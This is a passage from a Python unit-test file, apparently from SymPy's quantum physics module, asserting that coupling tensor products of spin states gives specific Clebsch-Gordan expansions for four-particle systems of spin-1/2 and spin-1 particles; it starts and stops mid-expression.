(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
def test_couple_4_states_numerical():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
) == JzKetCoupled(
2,
2,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 2
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== sqrt(2)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
+ JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
+ JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== -sqrt(2)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
- JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
- JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 2
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
) == JzKetCoupled(
2,
-2,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
# j1=S.Half, S.Half, S.Half, 1
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== 2
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== -sqrt(3)
